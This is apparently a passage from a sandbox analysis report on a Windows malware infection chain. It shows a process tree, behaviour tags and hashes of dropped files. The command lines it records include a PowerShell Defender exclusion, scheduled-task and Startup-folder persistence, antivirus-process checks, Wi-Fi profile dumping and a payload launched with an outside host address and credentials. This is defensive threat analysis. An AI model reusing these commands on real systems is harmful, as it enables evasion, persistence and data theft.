                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              6⤵
                              • Downloads MZ/PE file
                              • System Location Discovery: System Language Discovery
                              PID:7320
                          • C:\Users\Admin\AppData\Local\Temp\10167680101\7ef1418e3a.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167680101\7ef1418e3a.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            PID:5416
                          • C:\Users\Admin\AppData\Local\Temp\10167690101\3a14972bb4.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167690101\3a14972bb4.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:5944
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              6⤵
                              • Downloads MZ/PE file
                              • System Location Discovery: System Language Discovery
                              PID:4396
                          • C:\Users\Admin\AppData\Local\Temp\10167700101\7d014442c3.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167700101\7d014442c3.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:3164
                            • C:\Users\Admin\AppData\Local\Temp\10167700101\7d014442c3.exe
                              "C:\Users\Admin\AppData\Local\Temp\10167700101\7d014442c3.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:7512
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 960
                              6⤵
                              • Program crash
                              PID:7644
                          • C:\Users\Admin\AppData\Local\Temp\10167710101\OGVK2io.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167710101\OGVK2io.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: AddClipboardFormatListener
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6060
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\S0gQ0bV3\$77Anubis.exe""
                              6⤵
                              • Command and Scripting Interpreter: PowerShell
                              PID:8136
                          • C:\Users\Admin\AppData\Local\Temp\10167720101\0uzaP1a.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167720101\0uzaP1a.exe"
                            5⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:1312
                            • C:\Windows\System32\wscript.exe
                              "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"
                              6⤵
                              • Blocklisted process makes network request
                              • Downloads MZ/PE file
                              • Checks computer location settings
                              PID:7460
                              • C:\Windows\System32\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\B583D897E062783CF9E83000A4D683C6\71AA0C80E01A795775FA4FFE9031A16F.vbe" /f /rl highest
                                7⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:5980
                              • C:\Windows\System32\taskkill.exe
                                "C:\Windows\System32\taskkill.exe" /f /pid 2348 /t
                                7⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:8048
                              • C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
                                "C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf9
                                7⤵
                                • Executes dropped EXE
                                PID:6276
                          • C:\Users\Admin\AppData\Local\Temp\10167730101\P2SXMuh.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167730101\P2SXMuh.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:7716
                            • C:\Users\Admin\AppData\Local\Temp\10167730101\P2SXMuh.exe
                              "C:\Users\Admin\AppData\Local\Temp\10167730101\P2SXMuh.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:6132
                          • C:\Users\Admin\AppData\Local\Temp\10167740101\iZ73hNr.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167740101\iZ73hNr.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:6372
                            • C:\Users\Admin\AppData\Local\Temp\10167740101\iZ73hNr.exe
                              "C:\Users\Admin\AppData\Local\Temp\10167740101\iZ73hNr.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:6472
                          • C:\Users\Admin\AppData\Local\Temp\10167750101\zY9sqWs.exe
                            "C:\Users\Admin\AppData\Local\Temp\10167750101\zY9sqWs.exe"
                            5⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:6748
                            • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                              6⤵
                              • Downloads MZ/PE file
                              • Checks computer location settings
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:6820
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000700261\zero.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000700261\zero\'
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious use of AdjustPrivilegeToken
                                PID:6532
                              • C:\Users\Admin\AppData\Local\Temp\10000700261\zero\zero.exe
                                "C:\Users\Admin\AppData\Local\Temp\10000700261\zero\zero.exe"
                                7⤵
                                • Executes dropped EXE
                                • Accesses Microsoft Outlook profiles
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                • outlook_office_path
                                • outlook_win_path
                                PID:7208
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                  8⤵
                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                  PID:7424
                                  • C:\Windows\SysWOW64\chcp.com
                                    chcp 65001
                                    9⤵
                                      PID:7456
                                    • C:\Windows\SysWOW64\netsh.exe
                                      netsh wlan show profile
                                      9⤵
                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                      PID:4476
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr All
                                      9⤵
                                        PID:7480
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 2512
                                      8⤵
                                      • Program crash
                                      PID:7508
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                      8⤵
                                        PID:6844
                                        • C:\Windows\SysWOW64\chcp.com
                                          chcp 65001
                                          9⤵
                                            PID:7796
                                          • C:\Windows\SysWOW64\netsh.exe
                                            netsh wlan show networks mode=bssid
                                            9⤵
                                              PID:8028
                                        • C:\Users\Admin\AppData\Local\Temp\10000720101\firefox.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10000720101\firefox.exe"
                                          7⤵
                                            PID:6464
                                      • C:\Users\Admin\AppData\Local\Temp\10167760101\FvbuInU.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10167760101\FvbuInU.exe"
                                        5⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        PID:4124
                                      • C:\Users\Admin\AppData\Local\Temp\10167770101\v6Oqdnc.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10167770101\v6Oqdnc.exe"
                                        5⤵
                                          PID:5876
                                        • C:\Users\Admin\AppData\Local\Temp\10167780101\HmngBpR.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10167780101\HmngBpR.exe"
                                          5⤵
                                            PID:6064
                                            • C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                              C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                              6⤵
                                                PID:4084
                                                • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                  C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                  7⤵
                                                    PID:5348
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\SysWOW64\cmd.exe
                                                      8⤵
                                                        PID:6156
                                                • C:\Users\Admin\AppData\Local\Temp\10167790101\ADFoyxP.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10167790101\ADFoyxP.exe"
                                                  5⤵
                                                    PID:6240
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                                                      6⤵
                                                        PID:2192
                                                        • C:\Windows\SysWOW64\expand.exe
                                                          expand Go.pub Go.pub.bat
                                                          7⤵
                                                            PID:6596
                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                            tasklist
                                                            7⤵
                                                            • Enumerates processes with tasklist
                                                            PID:2200
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /I "opssvc wrsa"
                                                            7⤵
                                                              PID:6984
                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                              tasklist
                                                              7⤵
                                                              • Enumerates processes with tasklist
                                                              PID:2156
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                                              7⤵
                                                                PID:3624
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c md 353090
                                                                7⤵
                                                                  PID:5896
                                                                • C:\Windows\SysWOW64\extrac32.exe
                                                                  extrac32 /Y /E Really.pub
                                                                  7⤵
                                                                    PID:5132
                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                    findstr /V "posted" Good
                                                                    7⤵
                                                                      PID:3640
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                                                                      7⤵
                                                                        PID:6680
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                                                                        7⤵
                                                                          PID:7492
                                                                        • C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
                                                                          Seat.com m
                                                                          7⤵
                                                                            PID:1420
                                                                          • C:\Windows\SysWOW64\choice.exe
                                                                            choice /d y /t 5
                                                                            7⤵
                                                                              PID:3464
                                                                        • C:\Users\Admin\AppData\Local\Temp\10167800101\mAtJWNv.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10167800101\mAtJWNv.exe"
                                                                          5⤵
                                                                            PID:2168
                                                                            • C:\Users\Admin\AppData\Local\Temp\10167800101\mAtJWNv.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10167800101\mAtJWNv.exe"
                                                                              6⤵
                                                                                PID:5552
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2168 -s 948
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:7600
                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2A6614.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2A6614.exe
                                                                          3⤵
                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                          • Downloads MZ/PE file
                                                                          • Checks BIOS information in registry
                                                                          • Executes dropped EXE
                                                                          • Identifies Wine through registry keys
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2568
                                                                          • C:\Users\Admin\AppData\Local\Temp\E5VXU3FOHGS0A1UVTR5FNBGBGI.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\E5VXU3FOHGS0A1UVTR5FNBGBGI.exe"
                                                                            4⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2224
                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3f55g.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3f55g.exe
                                                                        2⤵
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Identifies Wine through registry keys
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3620
                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                      1⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3996
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3164 -ip 3164
                                                                      1⤵
                                                                        PID:7624
                                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                        1⤵
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Identifies Wine through registry keys
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:6020
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 7208 -ip 7208
                                                                        1⤵
                                                                          PID:7544
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                                                          1⤵
                                                                            PID:7236
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                                                              2⤵
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:5736
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                                                                            1⤵
                                                                              PID:4980
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2168 -ip 2168
                                                                              1⤵
                                                                                PID:5712

                                                                              Network

                                                                              MITRE ATT&CK Enterprise v15

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Temp\rXqVUsijI.hta

                                                                                Filesize

                                                                                779B

                                                                                MD5

                                                                                39c8cd50176057af3728802964f92d49

                                                                                SHA1

                                                                                68fc10a10997d7ad00142fc0de393fe3500c8017

                                                                                SHA256

                                                                                f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                                                                SHA512

                                                                                cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                Filesize

                                                                                3KB

                                                                                MD5

                                                                                556084f2c6d459c116a69d6fedcc4105

                                                                                SHA1

                                                                                633e89b9a1e77942d822d14de6708430a3944dbc

                                                                                SHA256

                                                                                88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                                                SHA512

                                                                                0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                Filesize

                                                                                2KB

                                                                                MD5

                                                                                25604a2821749d30ca35877a7669dff9

                                                                                SHA1

                                                                                49c624275363c7b6768452db6868f8100aa967be

                                                                                SHA256

                                                                                7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                                SHA512

                                                                                206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\07I069W9\service[1].htm

                                                                                Filesize

                                                                                1B

                                                                                MD5

                                                                                cfcd208495d565ef66e7dff9f98764da

                                                                                SHA1

                                                                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                SHA256

                                                                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                SHA512

                                                                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\N1V4B9VJ\soft[1]

                                                                                Filesize

                                                                                987KB

                                                                                MD5

                                                                                f49d1aaae28b92052e997480c504aa3b

                                                                                SHA1

                                                                                a422f6403847405cee6068f3394bb151d8591fb5

                                                                                SHA256

                                                                                81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                                                                                SHA512

                                                                                41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                944B

                                                                                MD5

                                                                                6d42b6da621e8df5674e26b799c8e2aa

                                                                                SHA1

                                                                                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                SHA256

                                                                                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                SHA512

                                                                                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                16KB

                                                                                MD5

                                                                                0adaf8cd8b315ec3c60db953953b87e6

                                                                                SHA1

                                                                                c518147fb62a5eb6ea1edf4136224f1eb15f15fb

                                                                                SHA256

                                                                                c39d0d42da4837b5985deb15beb79bf3d245914df3e70bb4ee433468d06428f0

                                                                                SHA512

                                                                                5aa78bdb444252ca16468f14a3ec17098a80bdd1b976deaa589fba87ad4b0d938292e08cbc7cd6dccf3f3610c2cf3d0ea4287a922a1e15b5102f93ee34e6b7fe

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                17KB

                                                                                MD5

                                                                                8c9a012941ec456714ba0d7853098a18

                                                                                SHA1

                                                                                0e14b06e664096087e0061cdda9c4f88557de455

                                                                                SHA256

                                                                                991ba4182190bf65f18352c16d64ef3990d85e6226fa1085e25a1a02bba2ed46

                                                                                SHA512

                                                                                c825caba6dcf46f2a11679d3792def9bf9dd59ef3b76e45b949a1ab765905a94aefbcea8ba867260f2f09bda1860641cd3404a29ebf7babf79db10614b4e1d4b

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                17KB

                                                                                MD5

                                                                                eb56785f25a3da1eceb9dd182b780aba

                                                                                SHA1

                                                                                d29a3fa783b735b76cbb4aee21d33fac5f50abb2

                                                                                SHA256

                                                                                901fbb025c5cde49910c7d3d225071feef231baa1b60c28b31c89bd3acb133f1

                                                                                SHA512

                                                                                58163b048167466e681c70adbc2a218e4eec93bdbe9a377ec2d6527fb2a59dc4ebc7977560ffec362f5c3bae695b28aeeeaab406c71b5aaeb07449c57e777622

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                17KB

                                                                                MD5

                                                                                1c8af9f161ed5a769324d7dcd5bc0291

                                                                                SHA1

                                                                                9ab4e3a94ead44d4ac6224f9fb006ef47ad4f05c

                                                                                SHA256

                                                                                d992cf253f698d3cf3cfccb481603d8e0e7a2d94c609fdc0b5e70b9a0e84e5fd

                                                                                SHA512

                                                                                7c67f9763bfd030001c64651086c8322f80a32e0db2afccfd2bd86337916954f04c6927f09da857966eaf7f5d8b6c8d2cd8807f8f8c57d93605b45f8bbe60db2

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                daac9c13da6de6812b488fe70af0184c

                                                                                SHA1

                                                                                1ec08d3ce601c8912c1bb293d6d5bc750491e186

                                                                                SHA256

                                                                                a36e315cb51ad4e3a8fc69ae369b1bdbc092554cef27b44a012c059d0184a8b5

                                                                                SHA512

                                                                                5b634a6c7b4f9d55754ca6c49be18ee4757e1aa5665084b2b1f87e4fc91c5e751ec198e636078aaecaafce416349fae990da0c2f12d22aa6d77dfb56032e8d8d

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                027f752ee0cbbc3ac151148c1292faee

                                                                                SHA1

                                                                                79a3e6fd6e0a6db95f8d45eb761a629c260f937c

                                                                                SHA256

                                                                                0359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da

                                                                                SHA512

                                                                                0db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97

                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uxecp77c.default-release\activity-stream.discovery_stream.json

                                                                                Filesize

                                                                                21KB

                                                                                MD5

                                                                                100f3d32e3d323822b84cfa223883b72

                                                                                SHA1

                                                                                b3c46c9201ecf60636b74ba211b4400f56e5c604

                                                                                SHA256

                                                                                cb7eb9c14658eb525eb7b019eba54de0ace9b1304ced3ae3bb1b9a062d902812

                                                                                SHA512

                                                                                5fd57f17753fe67a0643551bf00f0adf7a52f19f66037a046cc401966b07a7723243e02ee926dfb17b07281d8d7567827ebe6f5b7fd4cab17bba19d4a5599c4d

                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uxecp77c.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

                                                                                Filesize

                                                                                13KB

                                                                                MD5

                                                                                38f4049db5423e625c73deeac2e3ce65

                                                                                SHA1

                                                                                3418199fae56dd94f4ac0b52c63db58b8a45bb18

                                                                                SHA256

                                                                                b4b0413506e79257f2580e97cbccaccf21f25937db2c344379fa909655f53188

                                                                                SHA512

                                                                                69870c1b94b7a523fa74516479f600661a8120a3bbe094f4f894b3a747033174798d2cb7952fb998706f8e7fb30b6f3ffcb8b2270bc0f927d5680ee4c7f8fe8a

                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uxecp77c.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                Filesize

                                                                                15KB

                                                                                MD5

                                                                                96c542dec016d9ec1ecc4dddfcbaac66

                                                                                SHA1

                                                                                6199f7648bb744efa58acf7b96fee85d938389e4

                                                                                SHA256

                                                                                7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                                                SHA512

                                                                                cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                                              • C:\Users\Admin\AppData\Local\Temp\10000700261\zero.zip

                                                                                Filesize

                                                                                89KB

                                                                                MD5

                                                                                dc2525ec01bc09b10ae366299082013e

                                                                                SHA1

                                                                                50bedb861f1c6bc82dbeb72dd4aa0fbee394da29

                                                                                SHA256

                                                                                cf11800271985ad3d56571eaf31fad5971c702e5596e32a0a7834cf99e09b9c2

                                                                                SHA512

                                                                                e6fd429892c4bba3531c2db0e74dacc9321defff7177492c1c6fef977fdacda71d4debd56186f7509edcae3ae3f4d7dfc1764566a832d6a578f5d8aaa94fc34d

                                                                              • C:\Users\Admin\AppData\Local\Temp\10000720101\firefox.exe

                                                                                Filesize

                                                                                2.7MB

                                                                                MD5

                                                                                0d0d4f9ea0f47ba3542c03135e5c629d

                                                                                SHA1

                                                                                34c2840e259e3d4310512f8e0c09dac4daf970ba

                                                                                SHA256

                                                                                7df393c65a25d134df844c8d18c94f678e234a4a6b45776b9ed4dea6f3416089

                                                                                SHA512

                                                                                05e362675af48fda95a3f0a9fdcc71cc47c335e81fef855325994d0ab9c88b12c4e75ae78ec61a59f18cdf4a39cbfa89d4cb76fe27c77feb277f0dfd168ff13d

                                                                              • C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe

                                                                                Filesize

                                                                                1.2MB

                                                                                MD5

                                                                                5bdfc8ca0525eea734befa16da9e44c5

                                                                                SHA1

                                                                                5c9f1c71a7969f4509beb3172371306bc7939b0d

                                                                                SHA256

                                                                                75d8ef19654aa63e7d40dab5b3bf7022cdc27931848ef665052958286218f9d6

                                                                                SHA512

                                                                                8c4ccee4afca962afe97fb89f93c1b467ce0275b5f6a3065a709ca3047fd3700dd789a2d426bfbe09666cacf29026b768c631658e131e07809ca8d2b018a96c7

                                                                              • C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe

                                                                                Filesize

                                                                                1.2MB

                                                                                MD5

                                                                                9c19c2d6754fe7072a89aee0649a71da

                                                                                SHA1

                                                                                7c059bb15495c9ba60dd51e2b4b26563ce5a3a14

                                                                                SHA256

                                                                                a5da7473facf9f770700794f9bcc18e0eac3798afc83960bd18eb4dfec94f935

                                                                                SHA512

                                                                                b7d10b0f080377111911a16c99edebe572b3314ee5d9b84d36595ad067f4b36a0baa19a6077f9bdf4063b197932729dce32746bca1b73c691d53e2e4ebe7d857

                                                                              • C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe

                                                                                Filesize

                                                                                506KB

                                                                                MD5

                                                                                7cd44dfdd8ea0c997b623a3ea4df2c8a

                                                                                SHA1

                                                                                f20f1d7ae28cc47f29aeb4246883e39d51f56667

                                                                                SHA256

                                                                                5b2502b17aeae4139788cb0caadc0d33dd685b072cdfb1f08653217df116b287

                                                                                SHA512

                                                                                492f017c6a4d08f036fc19ffa9697c6ccd29e4957bc3db1a11fd0484e37714b34c15c0df85ab45039f6871d9862fc1dc124c7f05dd10e4fea0f3eaff68434bbd

                                                                              • C:\Users\Admin\AppData\Local\Temp\10167580101\OGVK2io.exe

                                                                                Filesize

                                                                                246KB

                                                                                MD5

                                                                                1d0c758e3e68d235b6741f8e122f77a3

                                                                                SHA1

